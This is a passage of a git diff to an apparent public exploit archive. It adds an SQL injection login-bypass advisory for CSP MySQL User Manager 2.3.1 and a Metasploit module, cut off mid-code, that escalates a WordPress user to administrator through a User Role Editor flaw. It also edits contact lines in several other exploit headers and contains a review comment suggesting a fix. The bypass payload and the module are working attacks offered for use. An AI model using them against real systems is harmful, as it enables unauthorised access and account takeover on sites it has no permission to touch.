diff --git a/exploits/linux/webapps/44589.txt b/exploits/linux/webapps/44589.txt
new file mode 100644
index 000000000..b010d8fbf
--- /dev/null
+++ b/exploits/linux/webapps/44589.txt
@@ -0,0 +1,41 @@
+# Exploit Title: CSP MySQL User Manager 2.3.1 - Authentication Bypass
+# Date: 2018-05-04
+# Exploit Author: Youssef mami
+# Vendor Homepage: https://code.google.com/archive/p/cspmum/
+# Software Link: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
+# Version: 2.3.1
+# Tested on: Linux 2.6.38-11
+# CVE : CVE-2018-10757
+
+##################################################################################
+.__ __
+| |__ _____ _____ _____ _____ _____ _____/ |_
+| | \\__ \ / \ / \\__ \ / \_/ __ \ __\
+| Y \/ __ \| Y Y \ Y Y \/ __ \| Y Y \ ___/| |
+|___| (____ /__|_| /__|_| (____ /__|_| /\___ >__|
+ \/ \/ \/ \/ \/ \/ \/
+.__ _____ __ .__
+|__| _____/ ____\___________ _____ _____ _/ |_|__| ________ __ ____
+| |/ \ __\/ _ \_ __ \/ \\__ \\ __\ |/ ____/ | \_/ __ \
+| | | \ | ( <_> ) | \/ Y Y \/ __ \| | | < <_| | | /\ ___/
+|__|___| /__| \____/|__| |__|_| (____ /__| |__|\__ |____/ \___ >
+ \/ \/ \/ |__| \/
+ .__
+ ______ ______________ _|__| ____ ____ ______
+ / ___// __ \_ __ \ \/ / |/ ___\/ __ \ / ___/
+ \___ \\ ___/| | \/\ /| \ \__\ ___/ \___ \
+/____ >\___ >__| \_/ |__|\___ >___ >____ >
+ \/ \/ \/ \/ \/
+
+
+##################################################################################
+SQL Injection Authentication Bypass
+Product Page: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
+
+Author(Pentester): Youssef mami (contact@hammamet-services.com)
+On Web: www.hammamet-services.com and http://hiservices.blogspot.com ( our blog )
+On Social: www.facebook.com/hammamet.informatique and https://twitter.com/hammamet_info
+##################################################################################
+we just need to input admin login like this : admin' or ' 1=1-- and any password :-)
+login : admin' or ' 1=1--
+password: hammamet informatique services
\ No newline at end of file
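Review bot: The body of the new advisory (the lines after the last `####` rule) states only the login value and never names the affected script, request parameter or query, and it gives no remediation, so a reader maintaining this product cannot tell what to patch or what to look for in logs. From the title and the quoted login value, the login field is presumably concatenated into the authentication query; the entry should say so explicitly and close with a line such as `Fix: pass the login and password to the authentication query as bound parameters (prepared statement) instead of building the SQL string from them`. The `Product Page:` line repeats the Software Link archive URL rather than the vendor homepage given in the header. The file also ends without a trailing newline.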
diff --git a/exploits/php/webapps/40804.txt b/exploits/php/webapps/40804.txt
index 4efd18793..60a4e4bbd 100644
--- a/exploits/php/webapps/40804.txt
+++ b/exploits/php/webapps/40804.txt
@@ -3,8 +3,8 @@
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/olimometer/
# Software Link: https://wordpress.org/plugins/olimometer/
-# Contact: info@tad.bg
-# Website: http://tad.bg
+# Contact: info@tad.group
+# Website: https://tad.group
# Category: Web Application Exploits
# Tested on: Debian 8
diff --git a/exploits/php/webapps/40971.txt b/exploits/php/webapps/40971.txt
index cc463abef..f8384c378 100644
--- a/exploits/php/webapps/40971.txt
+++ b/exploits/php/webapps/40971.txt
@@ -3,8 +3,8 @@
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/simply-poll/
# Software Link: https://wordpress.org/plugins/simply-poll/
-# Contact: info@tad.bg
-# Website: http://tad.bg
+# Contact: info@tad.group
+# Website: https://tad.group
# Category: Web Application Exploits
1 - Description
diff --git a/exploits/php/webapps/41919.txt b/exploits/php/webapps/41919.txt
index 0e8b0e22e..885d7784f 100644
--- a/exploits/php/webapps/41919.txt
+++ b/exploits/php/webapps/41919.txt
@@ -4,8 +4,8 @@
# Vendor Homepage: https://wordpress.org/plugins-wp/kittycatfish/
# Software Link: https://wordpress.org/plugins-wp/kittycatfish/
# Version: 2.2
-# Contact: info@tad.bg
-# Website: https://tad.bg
+# Contact: info@tad.group
+# Website: https://tad.group
# Category: Web Application Exploits
diff --git a/exploits/php/webapps/41920.txt b/exploits/php/webapps/41920.txt
index ef6a46f09..6c1690908 100644
--- a/exploits/php/webapps/41920.txt
+++ b/exploits/php/webapps/41920.txt
@@ -4,8 +4,8 @@
# Vendor Homepage: https://www.bestsoftinc.com/
# Software Link: https://www.bestsoftinc.com/car-rental-system.html
# Version: 2.5
-# Contact: info@tad.bg
-# Website: https://tad.bg
+# Contact: info@tad.group
+# Website: https://tad.group
# Category: Web Application Exploits
1. Description
diff --git a/exploits/php/webapps/41921.txt b/exploits/php/webapps/41921.txt
index 4883b51eb..f63dfe57f 100644
--- a/exploits/php/webapps/41921.txt
+++ b/exploits/php/webapps/41921.txt
@@ -4,8 +4,8 @@
# Vendor Homepage: http://wow-company.com/
# Software Link: https://wordpress.org/plugins/mwp-viral-signup/
# Version: 2.1
-# Contact: info@tad.bg
-# Website: https://tad.bg
+# Contact: info@tad.group
+# Website: https://tad.group
# Category: Web Application Exploits
1. Description
diff --git a/exploits/php/webapps/41922.txt b/exploits/php/webapps/41922.txt
index 29656062c..674badc48 100644
--- a/exploits/php/webapps/41922.txt
+++ b/exploits/php/webapps/41922.txt
@@ -4,8 +4,8 @@
# Vendor Homepage: http://wow-company.com/
# Software Link: https://wordpress.org/plugins/mwp-forms/
# Version: 2.1
-# Contact: info@tad.bg
-# Website: https://tad.bg
+# Contact: info@tad.group
+# Website: https://tad.group
# Category: Web Application Exploits
1. Description
diff --git a/exploits/php/webapps/44595.rb b/exploits/php/webapps/44595.rb
new file mode 100755
index 000000000..84dae8d91
--- /dev/null
+++ b/exploits/php/webapps/44595.rb
@@ -0,0 +1,174 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::HTTP::Wordpress
+
+ def initialize(info = {})
+ super(update_info(
+ info,
+ 'Name' => 'WordPress User Role Editor Plugin Privilege Escalation',
+ 'Description' => %q{
+ The WordPress User Role Editor plugin prior to v4.25, is lacking an authorization
+ check within its update user profile functionality ("update" function, contained
+ within the "class-user-other-roles.php" module).
+ Instead of verifying whether the current user has the right to edit other users'
+ profiles ("edit_users" WP capability), the vulnerable function verifies whether the
+ current user has the rights to edit the user ("edit_user" WP function) specified by
+ the supplied user id ("user_id" variable/HTTP POST parameter). Since the supplied
+ user id is the current user's id, this check is always bypassed (i.e. the current
+ user is always allowed to modify its profile).
+ This vulnerability allows an authenticated user to add arbitrary User Role Editor
+ roles to its profile, by specifying them via the "ure_other_roles" parameter within
+ the HTTP POST request to the "profile.php" module (issued when "Update Profile" is
+ clicked).
+ By default, this module grants the specified WP user all administrative privileges,
+ existing within the context of the User Role Editor plugin.
+ },
+ 'Author' =>
+ [
+ 'ethicalhack3r', # Vulnerability discovery
+ 'Tomislav Paskalev' # Exploit development, metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['WPVDB', '8432'],
+ ['URL', 'https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/']
+ ],
+ 'DisclosureDate' => 'Apr 05 2016',
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'URI path to WordPress', '/']),
+ OptString.new('ADMINPATH', [true, 'wp-admin directory', 'wp-admin/']),
+ OptString.new('CONTENTPATH', [true, 'wp-content directory', 'wp-content/']),
+ OptString.new('PLUGINSPATH', [true, 'wp plugins directory', 'plugins/']),
+ OptString.new('PLUGINPATH', [true, 'User Role Editor directory', 'user-role-editor/']),
+ OptString.new('USERNAME', [true, 'WordPress username']),
+ OptString.new('PASSWORD', [true, 'WordPress password']),
+ OptString.new('PRIVILEGES', [true, 'Desired User Role Editor privileges', 'activate_plugins,delete_others_pages,delete_others_posts,delete_pages,delete_posts,delete_private_pages,delete_private_posts,delete_published_pages,delete_published_posts,edit_dashboard,edit_others_pages,edit_others_posts,edit_pages,edit_posts,edit_private_pages,edit_private_posts,edit_published_pages,edit_published_posts,edit_theme_options,export,import,list_users,manage_categories,manage_links,manage_options,moderate_comments,promote_users,publish_pages,publish_posts,read_private_pages,read_private_posts,read,remove_users,switch_themes,upload_files,customize,delete_site,create_users,delete_plugins,delete_themes,delete_users,edit_plugins,edit_themes,edit_users,install_plugins,install_themes,unfiltered_html,unfiltered_upload,update_core,update_plugins,update_themes,ure_create_capabilities,ure_create_roles,ure_delete_capabilities,ure_delete_roles,ure_edit_roles,ure_manage_options,ure_reset_roles'])
+ ])
+ end
+
+ # Detect the vulnerable plugin by enumerating its readme.txt file
+ def check
+ readmes = ['readme.txt', 'Readme.txt', 'README.txt']
+
+ res = nil
+ readmes.each do |readme_name|
+ readme_url = normalize_uri(target_uri.path, datastore['CONTENTPATH'], datastore['PLUGINSPATH'], datastore['PLUGINPATH'], readme_name)
+ vprint_status("Checking #{readme_url}")
+ res = send_request_cgi(
+ 'uri' => readme_url,
+ 'method' => 'GET'
+ )
+ break if res && res.code == 200
+ end
+
+ if res.nil? || res.code != 200
+ # The readme.txt file does not exist
+ return Msf::Exploit::CheckCode::Unknown
+ end
+
+ version_res = extract_and_check_version(res.body.to_s, :readme, 'plugin', '4.25', nil)
+ return version_res
+ end
+
+ def username
+ datastore['USERNAME']
+ end
+
+ def password
+ datastore['PASSWORD']
+ end
+
+ # Search for specified data within the provided HTTP response
+ def check_response(res, name, regex)
+ res.body =~ regex
+ result = $1
+ if result
+ print_good("#{peer} - WordPress - Getting data - #{name}")
+ else
+ vprint_error("#{peer} #{res.body}")
+ fail_with("#{peer} - WordPress - Getting data - Failed (#{name})")
+ end
+ return result
+ end
+
+ # Run the exploit
+ def run
+ # Check if the specified target is running WordPress
+ fail_with("#{peer} - WordPress - Not Found") unless wordpress_and_online?
+
+ # Authenticate to WordPress
+ print_status("#{peer} - WordPress - Authentication - #{username}:#{password}")
+ cookie = wordpress_login(username, password)
+ fail_with("#{peer} - WordPress - Authentication - Failed") if cookie.nil?
+ store_valid_credential(user: username, private: password, proof: cookie)
+ print_good("#{peer} - WordPress - Authentication - OK")
+
+ # Get additional information from WordPress, required for the HTTP POST request (anti-CSRF tokens, user parameters)
+ url = normalize_uri(wordpress_url_backend, 'profile.php')
+ print_status("#{peer} - WordPress - Getting data - #{url}")
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => url,
+ 'cookie' => cookie
+ })
+
+ if res and res.code == 200
+ wp_nonce = check_response(res, "_wpnonce", /name=\"_wpnonce\" value=\"(.+?(?=\"))\"/)
+ color_nonce = check_response(res, "color-nonce", /name=\"color-nonce\" value=\"(.+?(?=\"))\"/)
+ checkuser_id = check_response(res, "checkuser_id", /name=\"checkuser_id\" value=\"(.+?(?=\"))\"/)
+ nickname = check_response(res, "nickname", /name=\"nickname\" id=\"nickname\" value=\"(.+?(?=\"))\"/)
+ display_name = check_response(res, "display_name", /name=\"display_name\" id=\"display_name\"\>[\s]+\